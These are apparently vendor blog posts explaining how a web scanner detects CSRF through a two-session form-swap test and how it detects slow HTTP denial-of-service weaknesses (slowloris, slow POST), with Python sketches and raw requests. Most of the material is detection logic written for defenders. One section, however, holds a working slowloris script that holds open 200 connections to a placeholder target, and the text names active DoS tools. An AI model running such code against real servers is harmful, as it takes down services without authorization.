Web Application Scanning & CSRF

Interest in the QualysGuard Web Application Scanning (WAS) module has been growing since its new UI was demonstrated last week at BlackHat. Along with such interest come questions about how the scanner works. The ultimate goal for WAS is to provide accurate, scalable testing for the most common, highest profile vulnerabilities (think of SQL injection and XSS) so that manual testing can skip the tedious and time-consuming aspects of an app review and focus on complex vulns that require brains rather than RAM.

One complex vuln in particular is CSRF. Automated, universal CSRF detection is a tough challenge, which is why we try to solve the problem in pieces rather than all at once. It’s the type of challenge that keeps web scanning interesting. Here’s a brief look at the approach we’ve taken to start bringing CSRF detection into the realm of automation.

First, the test assumes an authenticated scan. If the scan is not given credentials, then the tests won’t be performed. Also, tests are targeted to specific manifestations of CSRF rather than the broad set of attacks possible from our friendly sleeping giant.

Tests roughly follow these steps. Fundamentally, we’re trying to model an attack rather than make inferences based on pattern matching:

1. Identify forms with a "session context". This is a weaker version of (but hopefully a subset of) a "security context", because security often requires knowledge about the boundaries within an app and the authorized actions of a user. That knowledge is hard to come by automatically. Nevertheless, some utility can be had by looking at forms with the following attributes:

  • Are available only to an authenticated user.
  • Are not "trivial", such as search forms or logout buttons.
  • Have an observable effect, either on the session or the HTTP response. (Hint: Here’s where the automated scan becomes narrow, meaning prone to false negatives.)

2. Set up two separate sessions for the user (i.e., log in twice). Keep their cookie jars apart. We’ll refer to the sessions as Aardvark and Bobcat (or A & B or Alpha & Bravo, etc.). Remember, this is for a single user.

3. Obtain a form for session Aardvark.

4. Obtain a form for session Bobcat.

5. Swap the forms between the two sessions and submit. (Crossing the streams, like Egon told you not to do.)

  • The assumption is that any CSRF tokens in Aardvark’s form are tied to the session cookie(s) used by Aardvark and Bobcat’s belong to Bobcat. Things should blow up if the tokens and session don’t match.

6. Examine the "swapped" responses.

  • If the form’s fields never change between sessions, then this is a good indicator that no CSRF token is present. You have to run tests with a browser in order to make sure there’s no JavaScript dynamically changing the form when the page loads or the form is submitted.
  • If the response has a clear indication of error, then the app is more likely to be protected from CSRF. The obvious error is something like, "Invalid CSRF token". Sadly, the world is not unicorns and rainbows for automated scanning and errors may not be so obvious or point so directly to CSRF.
  • If the response is similar to the one received from the original request, then it appears that the form is not coupled to the user’s session. This is an indicator that the form is more likely vulnerable to CSRF.
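
To make the swap test concrete, here’s a minimal sketch of steps 2 through 6 in Python using the requests library. This is not the WAS implementation: the URLs, credentials, field names, and the naive similarity check are hypothetical placeholders, and a real scanner would drive a browser so that JavaScript-modified forms aren’t missed.

# Minimal sketch of the "swap" test. The login URL, form URL, credentials,
# and helper heuristics below are hypothetical placeholders.
import re
import requests

LOGIN_URL = "https://app.example.com/login"         # hypothetical
FORM_URL  = "https://app.example.com/profile/edit"  # hypothetical

def login(username, password):
    # Each call returns an independent session with its own cookie jar.
    s = requests.Session()
    s.post(LOGIN_URL, data={"user": username, "pass": password})
    return s

def get_form_fields(session):
    # Crude extraction of <input name=... value=...> pairs; a real scanner
    # parses the DOM in a browser to catch JavaScript that rewrites the form.
    html = session.get(FORM_URL).text
    return dict(re.findall(r'name="([^"]+)"\s+value="([^"]*)"', html))

def similar(a, b):
    # Naive comparison: same status code and roughly the same body size.
    return a.status_code == b.status_code and abs(len(a.text) - len(b.text)) < 50

# Step 2: two sessions for the same user, cookie jars kept apart.
aardvark = login("alice", "secret")
bobcat = login("alice", "secret")

# Steps 3 and 4: obtain the form once per session.
form_a = get_form_fields(aardvark)
form_b = get_form_fields(bobcat)

# If the fields never change between sessions, there is probably no
# per-session anti-CSRF token at all.
if form_a == form_b:
    print("No session-bound token observed")

# Step 5: cross the streams - submit Aardvark's form inside Bobcat's session.
swapped = bobcat.post(FORM_URL, data=form_a)
control = bobcat.post(FORM_URL, data=form_b)

# Step 6: if the swapped submission behaves like the control submission,
# the form does not appear to be coupled to the session.
if similar(swapped, control):
    print("Swapped token accepted: form is probably vulnerable to CSRF")
else:
    print("Swapped token rejected: form appears protected")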

What it won’t do, because these techniques are noisy and unreliable (as opposed to subtle and quick to anger):

  • Look for hidden form fields with names or values that match CSRF tokens. If an obvious token is present, that doesn’t mean the app is actually validating it.
  • Use static inspection of the form, DOM, or HTML to look for any examples of CSRF tokens. Why look for text patterns when you’re trying to determine a behavior? Not everything is solved by regexes. (Which really is unfortunate, by the way.)
  • Attempt to evaluate the predictability of anything that looks like a CSRF token.
  • Submit forms without loading the complete page and its resources in a browser; otherwise JavaScript-based countermeasures would not be noticed.

Nor will it demonstrate the compounding factor of CSRF on other vulnerabilities like XSS. That’s something that manual pen-testing should do. In other words, WAS is focused on identifying vulns (it should find an XSS vuln, but it won’t tie the vuln to a CSRF attack to demonstrate a threat). Manual pen-testing more often focuses on how deep an app can be compromised — and the real risks associated with it.

What it’ll miss:

  • Situations where session cookie(s) are static or relatively static for a user. This impairs the "swap" test.
  • CSRF that can affect unauthenticated users in a meaningful way. This is vague, but as you read more about CSRF you’ll find that some people believe any forgeable action should be considered a vuln. This speaks more to the issue of evaluating risk. You should be relying on people to analyze risk, not tools.
  • CSRF that affects the user’s privacy. This requires knowledge of the app’s policy and the impact of the attack.
  • Forms whose effect on a user’s security context manifests in a different response, or in a manner that isn’t immediately evident.
  • CSRF tokens in the header, which might lead to false positives.
  • CSRF vulns that manifest via links rather than forms. Apps put all kinds of functionality in hrefs rather than explicit form tags.
  • Other situations where we play games of anecdotes and what-ifs.

What we are trying to do:

  • Reduce noise. Don’t report vulns for the sake of reporting a vuln if no clear security context or actionable data can be provided.
  • Provide a discussion point so we can explain the benefits of automated web scanning and point out where manual follow-up will always be necessary.
  • Learn how real-world web sites implement CSRF countermeasures in order to find common behaviors that might be detectable via automation. You’d be surprised (maybe) at how often apps have security countermeasures that look nothing like OWASP recommendations and, consequently, fare rather poorly.
  • Experiment with pushing the bounds of what automation can do, while avoiding hyperbolic claims that automation solves everything.

The current state of CSRF testing in WAS should be relied on as a positive indicator (vuln found, vuln exists) more so than a negative indicator (no vuln found, no vulns exist). In other words, a CSRF vuln reported by WAS should not be a false positive and should be something that the app’s devs need to fix. It also means that if WAS doesn’t find a vuln, the app may still have CSRF vulns. For this particular test a clean report doesn’t mean a clean app; there are simply too many ways of looking at the CSRF problem to tackle it all at once. We’re trying to break the problem down into manageable parts in order to understand what approaches work. We want to hear your thoughts and feedback on this.

Identifying Slow HTTP Attack Vulnerabilities on Web Applications

Slow HTTP attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service.

These types of attack are easy to execute because a single machine is able to establish thousands of connections to a server and generate thousands of unfinished HTTP requests in a very short period of time using minimal bandwidth.

Due to implementation differences among various HTTP servers, two main attack vectors exist:

  • Slowloris: Slowing down HTTP headers, making the server wait for the final CRLF, which indicates the end of the headers section;
  • Slow POST: Slowing down the HTTP message body, making the server wait until all content arrives according to the Content-Length header; or until the final CRLF arrives, if HTTP/1.1 is being used and no Content-Length was declared.
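
To give a sense of how cheap these attacks are to mount, here’s a rough illustration of the slow headers vector in Python. This is not the WAS implementation and not the slowloris tool itself; the target host, connection count, and timings are arbitrary examples.

# Illustration only: open many sockets, send an incomplete request on each,
# then trickle a header line at intervals so the server never sees the blank
# line that ends the headers. Host, port, and timings are arbitrary examples.
import socket
import time

HOST, PORT = "target.example.com", 80   # hypothetical target
CONNECTIONS = 200
sockets = []

for _ in range(CONNECTIONS):
    s = socket.create_connection((HOST, PORT), timeout=10)
    # Request line plus one header, but no final CRLF to end the headers.
    s.send(b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\n")
    sockets.append(s)

while sockets:
    for s in list(sockets):
        try:
            # A few bytes every 10 seconds per connection keeps the server waiting.
            s.send(b"X-a: b\r\n")
        except OSError:
            sockets.remove(s)   # the server finally gave up on this connection
    time.sleep(10)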

The scary part is that these attacks can just look like requests that are taking a long time, so it’s hard to detect and prevent them by using traditional anti-DoS tools. Recent rumors indicate these attacks are happening right now: CIA.gov attacked using slowloris.

QualysGuard Web Application Scanner (WAS) uses a number of approaches to detect vulnerability to these attacks.

Slowloris Detection

To detect a slow headers (a.k.a. Slowloris) attack vulnerability (Qualys ID 150079), WAS opens two connections to the server and requests the base URL provided in the scan configuration.

The request sent to the first connection consists of a request line and one single header line but without the final CRLF, similar to the following:

GET / HTTP/1.1 CRLF
Connection: keep-alive CRLF

The request sent to the second connection looks identical to the first one, but WAS sends a follow-up header line some interval later to make the HTTP server think the peer is still alive:

Referer: http://www.qualys.com/products/qg_suite/was/ CRLF

Currently that interval is approximately 10 seconds plus the average response time during the crawl phase.

WAS considers the server platform vulnerable to a slowloris attack if the server closes the second connection more than 10 seconds later than the first one. In that case, the server prolonged its internal timeout value because it perceived the connection to be slow. Using a similar approach, an attacker could occupy a resource (thread or socket) on that server virtually forever by sending one byte every T – 1 seconds (or any interval less than T), where T is the timeout after which the server would otherwise drop the connection.

WAS does not report the server to be vulnerable if it keeps both connections open for the same long period of time (more than 2 minutes, for example), as that would be a false positive if the target server were IIS (which has protection against slow header attacks, but is less tolerant of real slow connections).
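
In rough terms, the slow headers check can be modeled with two raw sockets, as in the Python sketch below. This is only an approximation of the behavior described above; the target host, the 300-second cap, and the bookkeeping are illustrative rather than the exact WAS logic.

# Approximate model of the slow headers (QID 150079) check. Host, port,
# caps, and thresholds are illustrative placeholders.
import select
import socket
import time

HOST, PORT = "target.example.com", 80   # hypothetical target
PARTIAL = ("GET / HTTP/1.1\r\n"
           "Host: " + HOST + "\r\n"
           "Connection: keep-alive\r\n").encode()   # deliberately no final CRLF

start = time.time()
c1 = socket.create_connection((HOST, PORT)); c1.send(PARTIAL)   # left to starve
c2 = socket.create_connection((HOST, PORT)); c2.send(PARTIAL)   # gets a follow-up header

closed = {}                      # socket -> seconds until the server closed it
followup_sent = False
watched = [c1, c2]

while watched and time.time() - start < 300:       # cap the slow test
    # Roughly 10 seconds in, send one more header on c2 to look "alive but slow".
    if not followup_sent and time.time() - start > 10 and c2 in watched:
        c2.send(b"Referer: http://www.qualys.com/products/qg_suite/was/\r\n")
        followup_sent = True
    readable, _, _ = select.select(watched, [], [], 1)
    for s in readable:
        if not s.recv(4096):     # empty read: the server closed the connection
            closed[s] = time.time() - start
            watched.remove(s)

t1, t2 = closed.get(c1, 300.0), closed.get(c2, 300.0)
# If the extra bytes bought noticeably more time, the timeout can be pushed
# back indefinitely by trickling a byte before it expires.
if t2 - t1 > 10:
    print("Likely vulnerable to slow headers (QID 150079): %.0fs vs %.0fs" % (t1, t2))
else:
    print("No timeout extension observed")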

Slow POST Detection

To detect a slow POST (a.k.a. Are-You-Dead-Yet) attack vulnerability (QID 150085), WAS opens two other connections, and uses an action URL of a form it discovered during the crawl phase that doesn’t require authentication.

The request sent to the first connection looks like the following:

POST /url_that_accepts_post HTTP/1.1 CRLF
Host: host_to_test:port_if_not_default CRLF
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0;) CRLF
Connection: close CRLF
Referer: http://www.qualys.com/products/qg_suite/was/ CRLF
Content-Type: application/x-www-form-urlencoded CRLF
Content-Length: 512 CRLF
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 CRLF
CRLF
foo=bar

Similar to the slow headers approach, WAS sends an identical request to the second connection, and then 10 seconds later sends the following (again without the final CRLF):

alpha=beta

WAS considers the target vulnerable if any of the following conditions are met:

  • The server keeps the second connection open 10 seconds longer than the first one, or
  • The server keeps both connections open for more than 120 seconds, or
  • The server doesn’t close either connection within a 5-minute period (WAS limits slow tests to 5 minutes).

WAS assumes that if it is possible to either keep the connection open with an unfinished request for longer than 120 seconds or, even better, prolong the unfinished connection by sending one byte every T – 1 seconds (or any interval less than T), then it’s possible to acquire all server sockets or threads within that interval.
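
The slow POST check can be sketched in the same way; only the requests change, and the close-time comparison from the slow headers sketch applies unchanged. The host and form action below are placeholders.

# Approximate model of the slow POST (QID 150085) check. Host and form
# action are placeholders; timing comparison is as in the previous sketch.
import socket
import time

HOST, PORT = "target.example.com", 80            # hypothetical target
ACTION = "/url_that_accepts_post"                # a form action found while crawling

HEAD = ("POST " + ACTION + " HTTP/1.1\r\n"
        "Host: " + HOST + "\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: 512\r\n"
        "Connection: close\r\n"
        "\r\n").encode()

# Both connections get complete headers but only 7 bytes of the promised 512-byte body.
c1 = socket.create_connection((HOST, PORT)); c1.send(HEAD + b"foo=bar")
c2 = socket.create_connection((HOST, PORT)); c2.send(HEAD + b"foo=bar")

# Ten seconds later, feed the second connection a few more body bytes, then
# compare how long the server keeps c1 and c2 open, as in the slow headers sketch.
time.sleep(10)
c2.send(b"alpha=beta")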

WAS also performs a supplemental test to determine unhealthy behavior in handling POST requests, by sending a simple POST request to the base URI with a relatively large message body (65543 Kbytes). The content of the body is a random set of ASCII characters, and the content type is set to application/x-www-form-urlencoded. WAS assumes that if the server blindly accepts that request, e.g. responds with 200, then it gives an attacker more opportunity to prolong the slow connection by sending one byte every T – 1 seconds. Multiplying the body length by T – 1 gives the length of time an attacker could keep that connection open. QID 150086 is reported on detection of that behavior.
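
The supplemental check might look roughly like the following, again with a placeholder base URI and an illustrative (smaller) body size rather than the exact values WAS uses.

# Sketch of the supplemental large-body POST check (QID 150086). Base URI
# and body size are illustrative placeholders.
import random
import string
import requests

BASE_URI = "http://target.example.com/"          # hypothetical base URI
# Random ASCII body; WAS uses a much larger body than this illustrative one.
body = "".join(random.choice(string.ascii_letters) for _ in range(65543))

resp = requests.post(
    BASE_URI,
    data=body,
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)
# Blindly accepting an oversized urlencoded body (e.g. a 200 response) suggests
# an attacker could stretch delivery of such a body out over a very long time.
if resp.status_code == 200:
    print("Candidate for QID 150086: large POST body accepted without complaint")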

Mitigation

Tests performed by WAS are passive and as non-intrusive as possible, which minimizes the risk of taking down the server. But because of the possibility of false positives, care should be taken, especially if the HTTP server or IPS (Intrusion Prevention System) is configured to change data processing behavior when a certain number of suspicious requests are detected. If you are interested in active testing, which might take your server down, you can try one of these available tools:

  • slowloris
  • r-u-dead-yet
  • OWASP HTTP Post Tool (tests against slow headers as well)

Mitigation of slow HTTP attacks is platform specific, so it’d be nice for the community to share mitigation techniques in the comments below. I’ll post an update with information on some of those platforms, as well as general recommendations that can be extrapolated to particular platforms.

Update: Learn about New Open-Source Tool for Slow HTTP DoS Attack Vulnerabilities and download the slowhttptest tool.